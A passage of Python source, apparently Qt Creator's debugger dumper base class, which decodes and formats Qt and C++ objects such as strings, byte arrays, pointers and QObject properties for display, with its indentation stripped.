pairType = None, keyType = None, valueType = None, maxNumChild = None):
self.d = d
if keyType is None:
keyType = d.templateArgument(pairType, 0).unqualified()
if valueType is None:
valueType = d.templateArgument(pairType, 1)
d.pairData = PairedChildrenData(d, pairType, keyType, valueType, useKeyAndValue)
Children.__init__(self, d, numChild,
d.pairData.childType,
maxNumChild = maxNumChild,
addrBase = None, addrStep = None)
def __enter__(self):
self.savedPairData = self.d.pairData if hasattr(self.d, "pairData") else None
Children.__enter__(self)
def __exit__(self, exType, exValue, exTraceBack):
Children.__exit__(self, exType, exValue, exTraceBack)
self.d.pairData = self.savedPairData if self.savedPairData else None
class SubItem:
def __init__(self, d, component):
self.d = d
self.name = component
self.iname = None
def __enter__(self):
self.d.enterSubItem(self)
def __exit__(self, exType, exValue, exTraceBack):
return self.d.exitSubItem(self, exType, exValue, exTraceBack)
class NoAddress:
def __init__(self, d):
self.d = d
def __enter__(self):
self.savedPrintsAddress = self.d.currentPrintsAddress
self.d.currentPrintsAddress = False
def __exit__(self, exType, exValue, exTraceBack):
self.d.currentPrintsAddress = self.savedPrintsAddress
class TopLevelItem(SubItem):
def __init__(self, d, iname):
self.d = d
self.iname = iname
self.name = None
class UnnamedSubItem(SubItem):
def __init__(self, d, component):
self.d = d
self.iname = "%s.%s" % (self.d.currentIName, component)
self.name = None
class DumperBase:
def __init__(self):
self.isCdb = False
self.isGdb = False
self.isLldb = False
self.isCli = False
# Later set, or not set:
self.stringCutOff = 10000
self.displayStringLimit = 100
self.resetCaches()
self.childrenPrefix = 'children=['
self.childrenSuffix = '],'
self.dumpermodules = [
"qttypes",
"stdtypes",
"misctypes",
"boosttypes",
"creatortypes",
"personaltypes",
]
def resetCaches(self):
# This is a cache mapping from 'type name' to 'display alternatives'.
self.qqFormats = { "QVariant (QVariantMap)" : mapForms() }
# This is a cache of all known dumpers.
self.qqDumpers = {} # Direct type match
self.qqDumpersEx = {} # Using regexp
# This is a cache of all dumpers that support writing.
self.qqEditable = {}
# This keeps canonical forms of the typenames, without array indices etc.
self.cachedFormats = {}
# Maps type names to static metaobjects. If a type is known
# to not be QObject derived, it contains a 0 value.
self.knownStaticMetaObjects = {}
def putNewline(self):
pass
def stripClassTag(self, typeName):
if typeName.startswith("class "):
return typeName[6:]
if typeName.startswith("struct "):
return typeName[7:]
if typeName.startswith("const "):
return typeName[6:]
if typeName.startswith("volatile "):
return typeName[9:]
return typeName
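# Strips template arguments, spaces and array indices for the format lookup.
# For illustration: stripForFormat("QList<int>") -> "QList",
# stripForFormat("int [10]") -> "int[]".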
def stripForFormat(self, typeName):
if typeName in self.cachedFormats:
return self.cachedFormats[typeName]
stripped = ""
inArray = 0
for c in self.stripClassTag(typeName):
if c == '<':
break
if c == ' ':
continue
if c == '[':
inArray += 1
elif c == ']':
inArray -= 1
if inArray and ord(c) >= 48 and ord(c) <= 57:
continue
stripped += c
self.cachedFormats[typeName] = stripped
return stripped
# Hex decoding operating on str, return str.
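# For illustration: hexdecode("414243") returns "ABC".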
def hexdecode(self, s):
if sys.version_info[0] == 2:
return s.decode("hex")
return bytes.fromhex(s).decode("utf8")
# Hex encoding operating on str or bytes, return str.
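# For illustration: hexencode("ABC") returns "414243".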
def hexencode(self, s):
if s is None:
s = ''
if sys.version_info[0] == 2:
return s.encode("hex")
if isinstance(s, str):
s = s.encode("utf8")
return base64.b16encode(s).decode("utf8")
#def toBlob(self, value):
# """Abstract"""
def is32bit(self):
return self.ptrSize() == 4
def is64bit(self):
return self.ptrSize() == 8
def isQt3Support(self):
# assume no Qt 3 support by default
return False
def lookupQtType(self, typeName):
return self.lookupType(self.qtNamespace() + typeName)
# Clamps size to limit.
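# Returns (elided, shown). For illustration: computeLimit(50, 100) -> (0, 50)
# (everything shown), while computeLimit(500, 100) -> (500, 100), i.e. 500 is
# the true length and only 100 units are shown.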
def computeLimit(self, size, limit):
if limit == 0:
limit = self.displayStringLimit
if limit is None or size <= limit:
return 0, size
return size, limit
def vectorDataHelper(self, addr):
if self.qtVersion() >= 0x050000:
size = self.extractInt(addr + 4)
alloc = self.extractInt(addr + 8) & 0x7ffffff
data = addr + self.extractPointer(addr + 8 + self.ptrSize())
else:
alloc = self.extractInt(addr + 4)
size = self.extractInt(addr + 8)
data = addr + 16
return data, size, alloc
def byteArrayDataHelper(self, addr):
if self.qtVersion() >= 0x050000:
# QTypedArray:
# - QtPrivate::RefCount ref
# - int size
# - uint alloc : 31, capacityReserved : 1
# - qptrdiff offset
size = self.extractInt(addr + 4)
alloc = self.extractInt(addr + 8) & 0x7ffffff
data = addr + self.extractPointer(addr + 8 + self.ptrSize())
if self.ptrSize() == 4:
data = data & 0xffffffff
else:
data = data & 0xffffffffffffffff
elif self.qtVersion() >= 0x040000:
# Data:
# - QBasicAtomicInt ref;
# - int alloc, size;
# - [padding]
# - char *data;
alloc = self.extractInt(addr + 4)
size = self.extractInt(addr + 8)
data = self.extractPointer(addr + 8 + self.ptrSize())
else:
# Data:
# - QShared count;
# - QChar *unicode
# - char *ascii
# - uint len: 30
size = self.extractInt(addr + 3 * self.ptrSize()) & 0x3ffffff
alloc = size # pretend.
data = self.extractPointer(addr + self.ptrSize())
return data, size, alloc
# addr is the begin of a QByteArrayData structure
def encodeStringHelper(self, addr, limit):
# This should not happen, but we get it with LLDB as a result
# of inferior calls
if addr == 0:
return 0, ""
data, size, alloc = self.byteArrayDataHelper(addr)
if alloc != 0:
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return elided, self.readMemory(data, 2 * shown)
def encodeByteArrayHelper(self, addr, limit):
data, size, alloc = self.byteArrayDataHelper(addr)
if alloc != 0:
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return elided, self.readMemory(data, shown)
def putCharArrayHelper(self, data, size, charSize,
displayFormat = AutomaticFormat,
makeExpandable = True):
bytelen = size * charSize
elided, shown = self.computeLimit(bytelen, self.displayStringLimit)
mem = self.readMemory(data, shown)
if charSize == 1:
if displayFormat == Latin1StringFormat \
or displayFormat == SeparateLatin1StringFormat:
encodingType = "latin1"
else:
encodingType = "utf8"
childType = "char"
elif charSize == 2:
encodingType = "utf16"
childType = "short"
else:
encodingType = "ucs4"
childType = "int"
self.putValue(mem, encodingType, elided=elided)
if displayFormat == SeparateLatin1StringFormat \
or displayFormat == SeparateUtf8StringFormat \
or displayFormat == SeparateFormat:
elided, shown = self.computeLimit(bytelen, 100000)
self.putDisplay(encodingType + ':separate', self.readMemory(data, shown))
if makeExpandable:
self.putNumChild(size)
if self.isExpanded():
with Children(self):
for i in range(size):
self.putSubItem(i, data[i])
def readMemory(self, addr, size):
data = self.extractBlob(addr, size).toBytes()
return self.hexencode(data)
def encodeByteArray(self, value, limit = 0):
elided, data = self.encodeByteArrayHelper(self.extractPointer(value), limit)
return data
def byteArrayData(self, value):
return self.byteArrayDataHelper(self.extractPointer(value))
def putByteArrayValue(self, value):
elided, data = self.encodeByteArrayHelper(self.extractPointer(value), self.displayStringLimit)
self.putValue(data, "latin1", elided=elided)
def encodeString(self, value, limit = 0):
elided, data = self.encodeStringHelper(self.extractPointer(value), limit)
return data
def encodedUtf16ToUtf8(self, s):
return ''.join([chr(int(s[i:i+2], 16)) for i in range(0, len(s), 4)])
def encodeStringUtf8(self, value, limit = 0):
return self.encodedUtf16ToUtf8(self.encodeString(value, limit))
def stringData(self, value):
return self.byteArrayDataHelper(self.extractPointer(value))
def encodeStdString(self, value, limit = 0):
data = value["_M_dataplus"]["_M_p"]
sizePtr = data.cast(self.sizetType().pointer())
size = int(sizePtr[-3])
alloc = int(sizePtr[-2])
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return self.readMemory(data, shown)
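# For illustration with a hypothetical type name:
#   extractTemplateArgument("QMap<QString, int>", 0) -> "QString"
#   extractTemplateArgument("QMap<QString, int>", 1) -> "int"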
def extractTemplateArgument(self, typename, position):
level = 0
skipSpace = False
inner = ''
for c in typename[typename.find('<') + 1 : -1]:
if c == '<':
inner += c
level += 1
elif c == '>':
level -= 1
inner += c
elif c == ',':
if level == 0:
if position == 0:
return inner.strip()
position -= 1
inner = ''
else:
inner += c
skipSpace = True
else:
if skipSpace and c == ' ':
pass
else:
inner += c
skipSpace = False
# Handle local struct definitions like QList<main(int, char**)::SomeStruct>
inner = inner.strip()
p = inner.find(')::')
if p > -1:
inner = inner[p+3:]
return inner
def putStringValueByAddress(self, addr):
elided, data = self.encodeStringHelper(addr, self.displayStringLimit)
self.putValue(data, "utf16", elided=elided)
def putStringValue(self, value):
elided, data = self.encodeStringHelper(
self.extractPointer(value),
self.displayStringLimit)
self.putValue(data, "utf16", elided=elided)
def putAddressItem(self, name, value, type = ""):
with SubItem(self, name):
self.putValue("0x%x" % value)
self.putType(type)
self.putNumChild(0)
def putIntItem(self, name, value):
with SubItem(self, name):
self.putValue(value)
self.putType("int")
self.putNumChild(0)
def putBoolItem(self, name, value):
with SubItem(self, name):
self.putValue(value)
self.putType("bool")
self.putNumChild(0)
def putGenericItem(self, name, type, value, encoding = None):
with SubItem(self, name):
self.putValue(value, encoding)
self.putType(type)
self.putNumChild(0)
def putCallItem(self, name, value, func, *args):
try:
result = self.callHelper(value, func, args)
with SubItem(self, name):
self.putItem(result)
except:
with SubItem(self, name):
self.putSpecialValue("notcallable");
self.putNumChild(0)
def call(self, value, func, *args):
return self.callHelper(value, func, args)
def putAddressRange(self, base, step):
try:
if not base is None and not step is None:
self.put('addrbase="0x%x",' % toInteger(base))
self.put('addrstep="0x%x",' % toInteger(step))
return True
except:
#warn("ADDRBASE: %s" % base)
#warn("ADDRSTEP: %s" % step)
pass
return False
def putMapName(self, value, index = None):
ns = self.qtNamespace()
typeName = self.stripClassTag(str(value.type))
if typeName == ns + "QString":
self.put('keyencoded="utf16:2:0",key="%s",' % self.encodeString(value))
elif typeName == ns + "QByteArray":
self.put('keyencoded="latin1:1:0",key="%s",' % self.encodeByteArray(value))
elif typeName == "std::string":
self.put('keyencoded="latin1:1:0",key="%s",' % self.encodeStdString(value))
else:
val = str(value.GetValue()) if self.isLldb else str(value)
if index is None:
key = '%s' % val
else:
key = '[%s] %s' % (index, val)
self.put('keyencoded="utf8:1:0",key="%s",' % self.hexencode(key))
def putPair(self, pair, index = None):
if self.pairData.useKeyAndValue:
key = pair["key"]
value = pair["value"]
else:
key = pair["first"]
value = pair["second"]
if self.pairData.isCompact:
if self.pairData.keyIsQString:
self.put('keyencoded="utf16",key="%s",' % self.encodeString(key))
elif self.pairData.keyIsQByteArray:
self.put('keyencoded="latin1",key="%s",' % self.encodeByteArray(key))
elif self.pairData.keyIsStdString:
self.put('keyencoded="latin1",key="%s",' % self.encodeStdString(key))
else:
name = str(key.GetValue()) if self.isLldb else str(key)
if index == -1:
self.put('name="%s",' % name)
else:
self.put('key="[%s] %s",' % (index, name))
self.putItem(value)
else:
self.putEmptyValue()
self.putNumChild(2)
self.putField("iname", self.currentIName)
if self.isExpanded():
with Children(self):
if self.pairData.useKeyAndValue:
self.putSubItem("key", key)
self.putSubItem("value", value)
else:
self.putSubItem("first", key)
self.putSubItem("second", value)
def putPlainChildren(self, value, dumpBase = True):
self.putEmptyValue(-99)
self.putNumChild(1)
if self.isExpanded():
with Children(self):
self.putFields(value, dumpBase)
def isMapCompact(self, keyType, valueType):
if self.currentItemFormat() == CompactMapFormat:
return True
return self.isSimpleType(keyType) and self.isSimpleType(valueType)
def check(self, exp):
if not exp:
raise RuntimeError("Check failed")
def checkRef(self, ref):
count = self.extractInt(ref.address)
# Assume there aren't a million references to any object.
self.check(count >= -1)
self.check(count < 1000000)
def readToFirstZero(self, p, tsize, maximum):
code = (None, "b", "H", None, "I")[tsize]
base = toInteger(p)
blob = self.extractBlob(base, maximum).toBytes()
for i in xrange(0, maximum, tsize):
t = struct.unpack_from(code, blob, i)[0]
if t == 0:
return 0, i, self.hexencode(blob[:i])
# Real end is unknown.
return -1, maximum, self.hexencode(blob[:maximum])
def encodeCArray(self, p, tsize, limit):
elided, shown, blob = self.readToFirstZero(p, tsize, limit)
return elided, blob
def putItemCount(self, count, maximum = 1000000000):
# This needs to override the default value, so don't use 'put' directly.
if count > maximum:
self.putSpecialValue("minimumitemcount", maximum)
else:
self.putSpecialValue("itemcount", count)
self.putNumChild(count)
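# Serializes plain Python values into MI-style notation.
# For illustration: resultToMi({"answer": 42}) -> '{answer="42"}'.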
def resultToMi(self, value):
if type(value) is bool:
return '"%d"' % int(value)
if type(value) is dict:
return '{' + ','.join(['%s=%s' % (k, self.resultToMi(v))
for (k, v) in list(value.items())]) + '}'
if type(value) is list:
return '[' + ','.join([self.resultToMi(k)
for k in value]) + ']'
return '"%s"' % value
def variablesToMi(self, value, prefix):
if type(value) is bool:
return '"%d"' % int(value)
if type(value) is dict:
pairs = []
for (k, v) in list(value.items()):
if k == 'iname':
if v.startswith('.'):
v = '"%s%s"' % (prefix, v)
else:
v = '"%s"' % v
else:
v = self.variablesToMi(v, prefix)
pairs.append('%s=%s' % (k, v))
return '{' + ','.join(pairs) + '}'
if type(value) is list:
index = 0
pairs = []
for item in value:
if item.get('type', '') == 'function':
continue
name = item.get('name', '')
if len(name) == 0:
name = str(index)
index += 1
pairs.append((name, self.variablesToMi(item, prefix)))
pairs.sort(key = lambda pair: pair[0])
return '[' + ','.join([pair[1] for pair in pairs]) + ']'
return '"%s"' % value
def filterPrefix(self, prefix, items):
return [i[len(prefix):] for i in items if i.startswith(prefix)]
def tryFetchInterpreterVariables(self, args):
if not int(args.get('nativemixed', 0)):
return (False, '')
context = args.get('context', '')
if not len(context):
return (False, '')
expanded = args.get('expanded')
args['expanded'] = self.filterPrefix('local', expanded)
res = self.sendInterpreterRequest('variables', args)
if not res:
return (False, '')
reslist = []
for item in res.get('variables', {}):
if not 'iname' in item:
item['iname'] = '.' + item.get('name')
reslist.append(self.variablesToMi(item, 'local'))
watchers = args.get('watchers', None)
if watchers:
toevaluate = []
name2expr = {}
seq = 0
for watcher in watchers:
expr = self.hexdecode(watcher.get('exp'))
name = str(seq)
toevaluate.append({'name': name, 'expression': expr})
name2expr[name] = expr
seq += 1
args['expressions'] = toevaluate
args['expanded'] = self.filterPrefix('watch', expanded)
del args['watchers']
res = self.sendInterpreterRequest('expressions', args)
if res:
for item in res.get('expressions', {}):
name = item.get('name')
iname = 'watch.' + name
expr = name2expr.get(name)
item['iname'] = iname
item['wname'] = self.hexencode(expr)
item['exp'] = expr
reslist.append(self.variablesToMi(item, 'watch'))
return (True, 'data=[%s]' % ','.join(reslist))
def putField(self, name, value):
self.put('%s="%s",' % (name, value))
def putType(self, type, priority = 0):
# Higher priority values override lower ones.
if priority >= self.currentType.priority:
self.currentType.value = str(type)
self.currentType.priority = priority
def putValue(self, value, encoding = None, priority = 0, elided = None):
# Higher priority values override lower ones.
# elided = 0 indicates all data is available in value,
# otherwise it's the true length.
if priority >= self.currentValue.priority:
self.currentValue = ReportItem(value, encoding, priority, elided)
def putSpecialValue(self, encoding, value = ""):
self.putValue(value, encoding)
def putEmptyValue(self, priority = -10):
if priority >= self.currentValue.priority:
self.currentValue = ReportItem("", None, priority, None)
def putName(self, name):
self.put('name="%s",' % name)
def putBetterType(self, type):
if isinstance(type, ReportItem):
self.currentType.value = str(type.value)
else:
self.currentType.value = str(type)
self.currentType.priority += 1
def putNoType(self):
# FIXME: replace with something that does not need special handling
# in SubItem.__exit__().
self.putBetterType(" ")
def putInaccessible(self):
#self.putBetterType(" ")
self.putNumChild(0)
self.currentValue.value = None
def putNamedSubItem(self, component, value, name):
with SubItem(self, component):
self.putName(name)
self.putItem(value)
def isExpanded(self):
#warn("IS EXPANDED: %s in %s: %s" % (self.currentIName,
# self.expandedINames, self.currentIName in self.expandedINames))
return self.currentIName in self.expandedINames
def putPlainChildren(self, value):
self.putEmptyValue(-99)
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
self.putFields(value)
def putCStyleArray(self, value):
arrayType = value.type.unqualified()
innerType = value[0].type
innerTypeName = str(innerType.unqualified())
ts = innerType.sizeof
try:
self.putValue("@0x%x" % self.addressOf(value), priority = -1)
except:
self.putEmptyValue()
self.putType(arrayType)
try:
p = self.addressOf(value)
except:
p = None
displayFormat = self.currentItemFormat()
arrayByteSize = arrayType.sizeof
if arrayByteSize == 0:
# This should not happen. But it does, see QTCREATORBUG-14755.
# GDB/GCC produce sizeof == 0 for QProcess arr[3]
s = str(value.type)
itemCount = s[s.find('[')+1:s.find(']')]
if not itemCount:
itemCount = '100'
arrayByteSize = int(itemCount) * ts
n = int(arrayByteSize / ts)
if displayFormat != RawFormat and p:
if innerTypeName == "char" or innerTypeName == "wchar_t":
self.putCharArrayHelper(p, n, ts, self.currentItemFormat(),
makeExpandable = False)
else:
self.tryPutSimpleFormattedPointer(p, arrayType, innerTypeName,
displayFormat, arrayByteSize)
self.putNumChild(n)
if self.isExpanded():
self.putArrayData(p, n, innerType)
self.putPlotDataHelper(p, n, innerType)
def cleanAddress(self, addr):
if addr is None:
return "<no address>"
# We cannot use str(addr) as it yields rubbish for char pointers
# that might trigger Unicode encoding errors.
#return addr.cast(lookupType("void").pointer())
try:
return "0x%x" % toInteger(hex(addr), 16)
except:
warn("CANNOT CONVERT TYPE: %s" % type(addr))
try:
warn("ADDR: %s" % addr)
except:
pass
try:
warn("TYPE: %s" % addr.type)
except:
pass
return str(addr)
def tryPutPrettyItem(self, typeName, value):
if self.useFancy and self.currentItemFormat() != RawFormat:
self.putType(typeName)
nsStrippedType = self.stripNamespaceFromType(typeName)\
.replace("::", "__")
# The following block is only needed for D.
if nsStrippedType.startswith("_A"):
# DMD v2.058 encodes string[] as _Array_uns long long.
# With spaces.
if nsStrippedType.startswith("_Array_"):
qdump_Array(self, value)
return True
if nsStrippedType.startswith("_AArray_"):
qdump_AArray(self, value)
return True
dumper = self.qqDumpers.get(nsStrippedType)
if not dumper is None:
dumper(self, value)
return True
for pattern in self.qqDumpersEx.keys():
dumper = self.qqDumpersEx[pattern]
if re.match(pattern, nsStrippedType):
dumper(self, value)
return True
return False
def putSimpleCharArray(self, base, size = None):
if size is None:
elided, shown, data = self.readToFirstZero(base, 1, self.displayStringLimit)
else:
elided, shown = self.computeLimit(int(size), self.displayStringLimit)
data = self.readMemory(base, shown)
self.putValue(data, "latin1", elided=elided)
def putDisplay(self, editFormat, value):
self.put('editformat="%s",' % editFormat)
self.put('editvalue="%s",' % value)
# This is shared by pointer and array formatting.
def tryPutSimpleFormattedPointer(self, value, typeName, innerTypeName, displayFormat, limit):
if displayFormat == AutomaticFormat:
if innerTypeName == "char":
# Use UTF-8 as default for char *.
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
return True
if innerTypeName == "wchar_t":
self.putType(typeName)
charSize = self.lookupType('wchar_t').sizeof
(elided, data) = self.encodeCArray(value, charSize, limit)
if charSize == 2:
self.putValue(data, "utf16", elided=elided)
else:
self.putValue(data, "ucs4", elided=elided)
return True
if displayFormat == Latin1StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "latin1", elided=elided)
return True
if displayFormat == SeparateLatin1StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "latin1", elided=elided)
self.putDisplay("latin1:separate", data)
return True
if displayFormat == Utf8StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
return True
if displayFormat == SeparateUtf8StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "utf8", elided=elided)
self.putDisplay("utf8:separate", data)
return True
if displayFormat == Local8BitStringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 1, limit)
self.putValue(data, "local8bit", elided=elided)
return True
if displayFormat == Utf16StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 2, limit)
self.putValue(data, "utf16", elided=elided)
return True
if displayFormat == Ucs4StringFormat:
self.putType(typeName)
(elided, data) = self.encodeCArray(value, 4, limit)
self.putValue(data, "ucs4", elided=elided)
return True
return False
def putFormattedPointer(self, value):
#warn("POINTER: %s" % value)
if self.isNull(value):
#warn("NULL POINTER")
self.putType(value.type)
self.putValue("0x0")
self.putNumChild(0)
return
typeName = str(value.type)
(dereferencable, pointerValue) = self.pointerInfo(value)
self.putAddress(pointerValue)
self.putOriginalAddress(value)
if not dereferencable:
# Failure to dereference a pointer should at least
# show the value of a pointer.
self.putValue(self.cleanAddress(pointerValue))
self.putType(typeName)
self.putNumChild(0)
return
displayFormat = self.currentItemFormat(value.type)
innerType = value.type.target().unqualified()
innerTypeName = str(innerType)
if innerTypeName == "void":
#warn("VOID POINTER: %s" % displayFormat)
self.putType(typeName)
self.putValue(str(value))
self.putNumChild(0)
return
if displayFormat == RawFormat:
# Explicitly requested bald pointer.
self.putType(typeName)
self.putValue(self.hexencode(str(value)), "utf8:1:0")
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
with SubItem(self, '*'):
self.putItem(value.dereference())
return
limit = self.displayStringLimit
if displayFormat == SeparateLatin1StringFormat \
or displayFormat == SeparateUtf8StringFormat:
limit = 1000000
if self.tryPutSimpleFormattedPointer(value, typeName, innerTypeName, displayFormat, limit):
self.putNumChild(0)
return
if Array10Format <= displayFormat and displayFormat <= Array1000Format:
n = (10, 100, 1000, 10000)[displayFormat - Array10Format]
self.putType(typeName)
self.putItemCount(n)
self.putArrayData(value, n, innerType)
return
if self.isFunctionType(innerType):
# A function pointer.
val = str(value)
pos = val.find(" = ") # LLDB only, but...
if pos > 0:
val = val[pos + 3:]
self.putValue(val)
self.putType(innerTypeName)
self.putNumChild(0)
return
#warn("AUTODEREF: %s" % self.autoDerefPointers)
#warn("INAME: %s" % self.currentIName)
if self.autoDerefPointers or self.currentIName.endswith('.this'):
# Generic pointer type with AutomaticFormat.
# Never dereference char types.
if innerTypeName != "char" \
and innerTypeName != "signed char" \
and innerTypeName != "unsigned char" \
and innerTypeName != "wchar_t":
self.putType(innerTypeName)
savedCurrentChildType = self.currentChildType
self.currentChildType = self.stripClassTag(innerTypeName)
self.putItem(value.dereference())
self.currentChildType = savedCurrentChildType
self.putOriginalAddress(value)
return
#warn("GENERIC PLAIN POINTER: %s" % value.type)
#warn("ADDR PLAIN POINTER: 0x%x" % value.address)
self.putType(typeName)
self.putValue("0x%x" % self.pointerValue(value))
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
with SubItem(self, "*"):
self.putItem(value.dereference())
def putOriginalAddress(self, value):
if not value.address is None:
self.put('origaddr="0x%x",' % toInteger(value.address))
def putQObjectNameValue(self, value):
try:
intSize = self.intSize()
ptrSize = self.ptrSize()
# dd = value["d_ptr"]["d"] is just behind the vtable.
dd = self.extractPointer(value, offset=ptrSize)
if self.qtVersion() < 0x050000:
# Size of QObjectData: 5 pointer + 2 int
# - vtable
# - QObject *q_ptr;
# - QObject *parent;
# - QObjectList children;
# - uint isWidget : 1; etc..
# - int postedEvents;
# - QMetaObject *metaObject;
# Offset of objectName in QObjectPrivate: 5 pointer + 2 int
# - [QObjectData base]
# - QString objectName
objectName = self.extractPointer(dd + 5 * ptrSize + 2 * intSize)
else:
# Size of QObjectData: 5 pointer + 2 int
# - vtable
# - QObject *q_ptr;
# - QObject *parent;
# - QObjectList children;
# - uint isWidget : 1; etc...
# - int postedEvents;
# - QDynamicMetaObjectData *metaObject;
extra = self.extractPointer(dd + 5 * ptrSize + 2 * intSize)
if extra == 0:
return False
# Offset of objectName in ExtraData: 6 pointer
# - QVector<QObjectUserData *> userData; only #ifndef QT_NO_USERDATA
# - QList<QByteArray> propertyNames;
# - QList<QVariant> propertyValues;
# - QVector<int> runningTimers;
# - QList<QPointer<QObject> > eventFilters;
# - QString objectName
objectName = self.extractPointer(extra + 5 * ptrSize)
data, size, alloc = self.byteArrayDataHelper(objectName)
# Object names are short, and GDB can crash on too big chunks.
# Since this here is a convenience feature only, limit it.
if size <= 0 or size > 80:
return False
raw = self.readMemory(data, 2 * size)
self.putValue(raw, "utf16", 1)
return True
except:
# warn("NO QOBJECT: %s" % value.type)
pass
def extractStaticMetaObjectHelper(self, typeobj):
"""
Checks whether type has a Q_OBJECT macro.
Returns the staticMetaObject, or 0.
"""
if self.isSimpleType(typeobj):
return 0
typeName = str(typeobj)
isQObjectProper = typeName == self.qtNamespace() + "QObject"
if not isQObjectProper:
if self.directBaseClass(typeobj, 0) is None:
return 0
# No templates for now.
if typeName.find('<') >= 0:
return 0
result = self.findStaticMetaObject(typeName)
# We need to distinguish Q_OBJECT from Q_GADGET:
# a Q_OBJECT SMO has a non-null superdata (unless it's QObject itself),
# a Q_GADGET SMO has a null superdata (hopefully)
if result and not isQObjectProper:
superdata = self.extractPointer(result)
if toInteger(superdata) == 0:
# This looks like a Q_GADGET
return 0
return result
def extractStaticMetaObject(self, typeobj):
"""
Checks recursively whether a type derives from QObject.
"""
if not self.useFancy:
return 0
typeName = str(typeobj)
result = self.knownStaticMetaObjects.get(typeName, None)
if result is not None: # Is 0 or the static metaobject.
return result
try:
result = self.extractStaticMetaObjectHelper(typeobj)
except RuntimeError as error:
warn("METAOBJECT EXTRACTION FAILED: %s" % error)
result = 0
except:
warn("METAOBJECT EXTRACTION FAILED FOR UNKNOWN REASON")
result = 0
if not result:
base = self.directBaseClass(typeobj, 0)
if base:
result = self.extractStaticMetaObject(base)
self.knownStaticMetaObjects[typeName] = result
return result
def staticQObjectMetaData(self, metaobject, offset1, offset2, step):
items = []
dd = metaobject["d"]
data = self.extractPointer(dd["data"])
sd = self.extractPointer(dd["stringdata"])
metaObjectVersion = self.extractInt(data)
itemCount = self.extractInt(data + offset1)
itemData = -offset2 if offset2 < 0 else self.extractInt(data + offset2)
if metaObjectVersion >= 7: # Qt 5.
byteArrayDataType = self.lookupType(self.qtNamespace() + "QByteArrayData")
byteArrayDataSize = byteArrayDataType.sizeof
for i in range(itemCount):
x = data + (itemData + step * i) * 4
literal = sd + self.extractInt(x) * byteArrayDataSize
ldata, lsize, lalloc = self.byteArrayDataHelper(literal)
items.append(self.extractBlob(ldata, lsize).toString())
else: # Qt 4.
for i in range(itemCount):
x = data + (itemData + step * i) * 4
ldata = sd + self.extractInt(x)
items.append(self.extractCString(ldata).decode("utf8"))
return items
def staticQObjectPropertyCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 24)
def staticQObjectPropertyNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 24, 28, 3)
def staticQObjectMethodCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 16)
def staticQObjectMethodNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 16, 20, 5)
def staticQObjectSignalCount(self, metaobject):
return self.extractInt(self.extractPointer(metaobject["d"]["data"]) + 52)
def staticQObjectSignalNames(self, metaobject):
return self.staticQObjectMetaData(metaobject, 52, -14, 5)
def extractCString(self, addr):
result = bytearray()
while True:
d = self.extractByte(addr)
if d == 0:
break
result.append(d)
addr += 1
return result
def listChildrenGenerator(self, addr, innerType):
base = self.extractPointer(addr)
begin = self.extractInt(base + 8)
end = self.extractInt(base + 12)
array = base + 16
if self.qtVersion() < 0x50000:
array += self.ptrSize()
size = end - begin
innerSize = innerType.sizeof
stepSize = self.ptrSize()
addr = array + begin * stepSize
isInternal = innerSize <= stepSize and self.isMovableType(innerType)
for i in range(size):
if isInternal:
yield self.createValue(addr + i * stepSize, innerType)
else:
p = self.extractPointer(addr + i * stepSize)
yield self.createValue(p, innerType)
def vectorChildrenGenerator(self, addr, innerType):
base = self.extractPointer(addr)
size = self.extractInt(base + 4)
data = base + self.extractPointer(base + 8 + self.ptrSize())
innerSize = innerType.sizeof
for i in range(size):
yield self.createValue(data + i * innerSize, innerType)
# This is called when a QObject-derived class is expanded
def putQObjectGuts(self, qobject, smo):
intSize = self.intSize()
ptrSize = self.ptrSize()
# dd = value["d_ptr"]["d"] is just behind the vtable.
dd = self.extractPointer(qobject, offset=ptrSize)
isQt5 = self.qtVersion() >= 0x50000
extraDataOffset = 5 * ptrSize + 8 if isQt5 else 6 * ptrSize + 8
extraData = self.extractPointer(dd + extraDataOffset)
#with SubItem(self, "[extradata]"):
# self.putValue("0x%x" % toInteger(extraData))
# Parent and children.
try:
d_ptr = qobject["d_ptr"]["d"]
self.putSubItem("[parent]", d_ptr["parent"])
self.putSubItem("[children]", d_ptr["children"])
except:
pass
with SubItem(self, "[properties]"):
propertyCount = 0
usesVector = self.qtVersion() >= 0x50700
if self.isExpanded():
propertyNames = self.staticQObjectPropertyNames(smo)
propertyCount = len(propertyNames) # Doesn't include dynamic properties.
with Children(self):
# Static properties.
for i in range(propertyCount):
name = propertyNames[i]
self.putCallItem(str(name), qobject, "property", '"' + name + '"')
# Dynamic properties.
if extraData:
byteArrayType = self.lookupQtType("QByteArray")
variantType = self.lookupQtType("QVariant")
names = self.listChildrenGenerator(extraData + ptrSize, byteArrayType)
if usesVector:
values = self.vectorChildrenGenerator(extraData + 2 * ptrSize, variantType)
else:
values = self.listChildrenGenerator(extraData + 2 * ptrSize, variantType)
for (k, v) in zip(names, values):
with SubItem(self, propertyCount):
self.put('key="%s",' % self.encodeByteArray(k))
self.put('keyencoded="latin1",')
self.putItem(v)
propertyCount += 1
self.putValue(str('<%s items>' % propertyCount if propertyCount else '<>0 items>'))
self.putNumChild(1)
with SubItem(self, "[methods]"):
methodCount = self.staticQObjectMethodCount(smo)
self.putItemCount(methodCount)
if self.isExpanded():
methodNames = self.staticQObjectMethodNames(smo)
with Children(self):
